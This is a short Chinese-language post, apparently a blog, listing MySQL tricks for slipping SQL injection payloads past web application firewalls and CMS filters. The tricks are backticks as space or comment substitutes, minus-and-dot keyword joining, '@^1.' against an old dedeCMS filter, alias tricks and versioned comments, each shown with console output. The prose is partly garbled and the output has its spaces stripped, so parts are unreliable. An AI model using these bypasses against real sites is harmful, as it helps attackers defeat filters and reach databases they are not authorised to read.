文中中,小编与各位介绍了好多个WAF绕开的技巧。针对一些大家都掌握的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不会再重造轮子。
Mysql:
tips1: 奇妙的 ` (格式输出表的那一个控制符)
过空格 过一些正则表达式。
mysql>select`version`() ->; |`version`()| |5.1.50-community-log| 1rowinset(0.00sec)
一个更好玩儿的技巧,这一` 控制符可以当注解符用(限制标准)。
mysql>selectidfromqs_adminswhereid=1;`dfffandcommentit; |id| |1| 1rowinset(0.00sec) `>usage:whereid=’0′`’xxxxcommenton.
tips2:奇妙的“- .”:
mysql>selectidfromqs_admins; |id| |1| 1rowinset(0.00sec) mysql>select id-1 1.fromqs_admins; | id-1 1.| |1| 1rowinset(0.00sec) mysql>select-id-1 3.fromqs_admins; |-id-1 3.| |1| 1rowinset(0.00sec)
(有的人并不是一直在说关键词怎么玩?过虑一个from … 就这样连起來过)
tips3: @
mysql>select@^1.fromqs_admins; |@^1.| |NULL|
这个是bypass 以前dedeCMS filter。
或是下边那样也是可以的:
tips4:mysql function() as xxx 还可以无需as 和空格
mysql>select-count(id)testfromqs_admins; |test| |-1| 1rowinset(0.00sec)
tips5:/*![>5000]*/ 新结构 版本信息(这一很有可能有一些落伍了。)
mysql>/*!40000select*/idfromqs_admins; |id| |1| 1rowinset(0.00sec)